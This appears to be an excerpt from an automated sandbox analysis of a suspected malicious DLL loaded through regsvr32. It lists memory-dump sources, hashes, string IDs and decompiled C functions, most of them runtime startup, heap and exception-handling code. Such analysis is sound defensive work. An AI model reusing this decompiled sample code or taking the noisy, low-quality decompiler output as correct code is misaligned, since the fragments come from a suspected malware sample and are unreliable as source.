                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                • API String ID: 2485490239-3005932707
                                                                                                • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                • API String ID: 0-308291206
                                                                                                • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                • Instruction ID: 4e0cdc38288265e2a701971e983b1a1c86ed4ef80fce63a74d3c7228a4fecab7
                                                                                                • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                • Instruction Fuzzy Hash: A5913C7190074A8BDF48DF28C88A4DE3FB1FB58358F65422CEC4AA6290D778D599CBC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: /Q$;$F8$KT$F$Z
                                                                                                • API String ID: 0-1951868783
                                                                                                • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                • Instruction ID: 61ae0c8900656f9f40f77758217cd68dd754d73ecee75d9143294b477fe62952
                                                                                                • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                • Instruction Fuzzy Hash: 9C6147B0E147098FCB48CFA8D88A4DEBBB1FB58314F10821DE846A7290D7749995CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 37%
                                                                                                			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                				long long _v32;
                                                                                                				long long _v40;
                                                                                                				intOrPtr _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				intOrPtr _v56;
                                                                                                				intOrPtr _t15;
                                                                                                				long long _t19;
                                                                                                				long long _t20;
                                                                                                
                                                                                                				_a24 = _t20;
                                                                                                				_a16 = _t15;
                                                                                                				_a8 = _t19;
                                                                                                				_v56 = _a16;
                                                                                                				if (_v56 == 1) goto 0x80010ae6;
                                                                                                				goto 0x80010bf4;
                                                                                                				 *0x80022ca0 = _a8;
                                                                                                				_v52 = 0x904;
                                                                                                				_v48 = 0xf9e;
                                                                                                				_v40 = 0;
                                                                                                				_v32 = 0;
                                                                                                				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
                                                                                                				ExitProcess(??);
                                                                                                			}

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 621844428-0
                                                                                                • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0c$\$c2&
                                                                                                • API String ID: 0-1001447681
                                                                                                • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                • Instruction ID: 69ef4e2f0c1c1579892a30c935803ea232269405137ffc72474d58023bb36526
                                                                                                • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                • Instruction Fuzzy Hash: 9C02E6715093C88BEBBECF64C889ADA7BADFB44708F10521DEE0A9E258DB745744CB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .f$M$N5
                                                                                                • API String ID: 0-1477915503
                                                                                                • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                • Instruction ID: fb99541d3e62267ac77c1ff36a94e8f12d462ef6689ef4c6140db4a6f27d9291
                                                                                                • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                • Instruction Fuzzy Hash: 91A16E705197849FD7A8DF28C8C959EBBE0FB84314F905A1DFC869B2A0CB78D945CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: A]jN
                                                                                                • API String ID: 0-1761522205
                                                                                                • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                • Instruction ID: a56874e6b7e4cd5633a891959add1cf3d06b87349b87e49f9aa22017a58360c4
                                                                                                • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                • Instruction Fuzzy Hash: C0D1E4B1D0460A8FDF48DFA8C48A4AEBBB1FB58304F50462DD516BB290D7786A46CFD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C
                                                                                                • API String ID: 0-3705061908
                                                                                                • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                • Instruction ID: cc72b4590bfe3e8a83cb905d31e8116443894c0ff215067d02f5893a5315fa09
                                                                                                • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                • Instruction Fuzzy Hash: 5561D37151C7848BD768DF28C58A40FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 100%
                                                                                                			E0000000118000147C(void* __edx) {
                                                                                                				void* _t5;
                                                                                                
                                                                                                				_t5 = __edx;
                                                                                                				if (_t5 == 0) goto 0x800014bd;
                                                                                                				if (_t5 == 0) goto 0x800014b1;
                                                                                                				if (_t5 == 0) goto 0x800014a4;
                                                                                                				if (__edx == 1) goto 0x8000149d;
                                                                                                				return 1;
                                                                                                			}

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                • String ID:
                                                                                                • API String ID: 190073905-0
                                                                                                • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                                • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 71%
                                                                                                			E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                                                                                                				long long _v56;
                                                                                                				void* __rdi;
                                                                                                				void* __rsi;
                                                                                                				void* __rbp;
                                                                                                				void* _t31;
                                                                                                				intOrPtr _t37;
                                                                                                				void* _t50;
                                                                                                				intOrPtr* _t67;
                                                                                                				long long _t73;
                                                                                                				void* _t75;
                                                                                                				long long _t89;
                                                                                                				signed int _t90;
                                                                                                				void* _t91;
                                                                                                				intOrPtr* _t92;
                                                                                                				void* _t95;
                                                                                                				void* _t98;
                                                                                                
                                                                                                				_t98 = __r8;
                                                                                                				_t75 = __rcx;
                                                                                                				_a8 = __rbx;
                                                                                                				r14d = __ecx;
                                                                                                				if (__ecx == 0) goto 0x8000653f;
                                                                                                				_t2 = _t75 - 1; // -1
                                                                                                				if (_t2 - 1 <= 0) goto 0x8000640a;
                                                                                                				E000000011800086F4(_t2 - 1, __rax);
                                                                                                				_t3 = _t90 + 0x16; // 0x16
                                                                                                				 *__rax = _t3;
                                                                                                				E000000011800085B8();
                                                                                                				goto 0x8000653f;
                                                                                                				E00000001180009CD8(_t50, __rbx, _t91);
                                                                                                				r8d = 0x104;
                                                                                                				E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
                                                                                                				_t92 =  *0x80022630; // 0xd13350
                                                                                                				 *0x80022610 = 0x80022250;
                                                                                                				if (_t92 == 0) goto 0x8000643e;
                                                                                                				if ( *_t92 != dil) goto 0x80006441;
                                                                                                				_t67 =  &_a32;
                                                                                                				_a24 = _t90;
                                                                                                				_v56 = _t67;
                                                                                                				r8d = 0;
                                                                                                				_a32 = _t90;
                                                                                                				_t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
                                                                                                				r8d = 1;
                                                                                                				E0000000118000636C(_t31, _a24, _a32, _t98); // executed
                                                                                                				_t73 = _t67;
                                                                                                				if (_t67 != 0) goto 0x80006499;
                                                                                                				E000000011800086F4(_t67, _t67);
                                                                                                				 *_t67 = 0xc;
                                                                                                				E0000000118000878C(_t67, _a24);
                                                                                                				goto 0x80006403;
                                                                                                				_v56 =  &_a32;
                                                                                                				E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
                                                                                                				if (r14d != 1) goto 0x800064d1;
                                                                                                				_t37 = _a24 - 1;
                                                                                                				 *0x80022620 = _t73;
                                                                                                				 *0x80022618 = _t37;
                                                                                                				goto 0x8000653a;
                                                                                                				_a16 = _t90;
                                                                                                				0x80009298();
                                                                                                				if (_t37 == 0) goto 0x80006500;
                                                                                                				E0000000118000878C( &_a32, _a16);
                                                                                                				_a16 = _t90;
                                                                                                				E0000000118000878C( &_a32, _t73);
                                                                                                				goto 0x8000653f;
                                                                                                				_t89 = _a16;
                                                                                                				if ( *_t89 == _t90) goto 0x8000651b;
                                                                                                				if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
                                                                                                				 *0x80022618 = 0;
                                                                                                				_a16 = _t90;
                                                                                                				 *0x80022620 = _t89;
                                                                                                				E0000000118000878C(_t89 + 8, _t90 + 1);
                                                                                                				_a16 = _t90;
                                                                                                				E0000000118000878C(_t89 + 8, _t73);
                                                                                                				return _t37;
                                                                                                			}

                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE
                                                                                                  • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
                                                                                                  • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                                                                                • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                • API String ID: 2724796048-464481000
                                                                                                • Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                • Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
                                                                                                • Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                • Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID: li
                                                                                                • API String ID: 963392458-3170889640
                                                                                                • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                • Instruction ID: e63864061e860e38363abd18de67b09625aa5e39598c778710588c11fb3017ab
                                                                                                • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                • Instruction Fuzzy Hash: EB41E67091CB848FDBA4DF18D0C979AB7E0FB98315F20495DE588C7296CB789884CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 100%
                                                                                                			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                
                                                                                                				_a8 = __rbx;
                                                                                                				_a16 = __rsi;
                                                                                                				_a24 = __rdi;
                                                                                                				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
                                                                                                				E000000011800086F4(__ecx - 0x2000, __rax);
                                                                                                				 *__rax = 9;
                                                                                                				E000000011800085B8();
                                                                                                				return 9;
                                                                                                			}


                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                • String ID:
                                                                                                • API String ID: 3215553584-0
                                                                                                • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                                                C-Code - Quality: 44%
                                                                                                			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                				void* __rbx;
                                                                                                				intOrPtr* _t22;
                                                                                                				signed int _t29;
                                                                                                
                                                                                                				_t29 = __rdx;
                                                                                                				if (__rcx == 0) goto 0x80008733;
                                                                                                				_t1 = _t29 - 0x20; // -32
                                                                                                				_t22 = _t1;
                                                                                                				if (_t22 - __rdx < 0) goto 0x80008776;
                                                                                                				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                				goto 0x8000875a;
                                                                                                				if (E0000000118000C08C() == 0) goto 0x80008776;
                                                                                                				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
                                                                                                				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                				if (_t22 == 0) goto 0x80008745;
                                                                                                				goto 0x80008783;
                                                                                                				E000000011800086F4(_t22, _t22);
                                                                                                				 *_t22 = 0xc;
                                                                                                				return 0;
                                                                                                			}
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 71%
                                                                                                			E00000001180001268(void* __ecx) {
                                                                                                				void* __rbx;
                                                                                                				void* _t12;
                                                                                                				void* _t17;
                                                                                                				void* _t18;
                                                                                                				void* _t19;
                                                                                                				void* _t20;
                                                                                                				void* _t21;
                                                                                                
                                                                                                				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
                                                                                                				if (E00000001180002A08() != 0) goto 0x80001297;
                                                                                                				goto 0x800012ab; // executed
                                                                                                				E00000001180006CDC(_t17); // executed
                                                                                                				if (0 != 0) goto 0x800012a9;
                                                                                                				E00000001180002A58(0);
                                                                                                				goto 0x80001293;
                                                                                                				return 1;
                                                                                                			}
                                                                                                APIs
                                                                                                • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                  • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                Similarity
                                                                                                • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                • String ID:
                                                                                                • API String ID: 108617051-0
                                                                                                • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: LoadString$ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 80118013-0
                                                                                                • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: ErrorLastShowWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3252650109-0
                                                                                                • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3140674995-0
                                                                                                • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 65%
                                                                                                			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
                                                                                                				void* _t36;
                                                                                                				int _t38;
                                                                                                				signed long long _t60;
                                                                                                				long long _t63;
                                                                                                				_Unknown_base(*)()* _t82;
                                                                                                				void* _t86;
                                                                                                				void* _t87;
                                                                                                				void* _t89;
                                                                                                				signed long long _t90;
                                                                                                				struct _EXCEPTION_POINTERS* _t95;
                                                                                                
                                                                                                				 *((long long*)(_t89 + 0x10)) = __rbx;
                                                                                                				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                				_t87 = _t89 - 0x4f0;
                                                                                                				_t90 = _t89 - 0x5f0;
                                                                                                				_t60 =  *0x80021010; // 0xeaed15642a89
                                                                                                				 *(_t87 + 0x4e0) = _t60 ^ _t90;
                                                                                                				if (__ecx == 0xffffffff) goto 0x8000832b;
                                                                                                				E00000001180001C40(_t36);
                                                                                                				r8d = 0x98;
                                                                                                				E00000001180002680();
                                                                                                				r8d = 0x4d0;
                                                                                                				E00000001180002680();
                                                                                                				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
                                                                                                				_t63 = _t87 + 0x10;
                                                                                                				 *((long long*)(_t90 + 0x50)) = _t63;
                                                                                                				__imp__RtlCaptureContext();
                                                                                                				r8d = 0;
                                                                                                				__imp__RtlLookupFunctionEntry();
                                                                                                				if (_t63 == 0) goto 0x800083be;
                                                                                                				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
                                                                                                				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
                                                                                                				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
                                                                                                				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
                                                                                                				__imp__RtlVirtualUnwind();
                                                                                                				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
                                                                                                				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
                                                                                                				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
                                                                                                				_t38 = IsDebuggerPresent();
                                                                                                				SetUnhandledExceptionFilter(_t82, _t86);
                                                                                                				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
                                                                                                				if (_t38 != 0) goto 0x80008420;
                                                                                                				if (__ecx == 0xffffffff) goto 0x80008420;
                                                                                                				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
                                                                                                			}
                                                                                                0x1800083a8
                                                                                                0x1800083b1
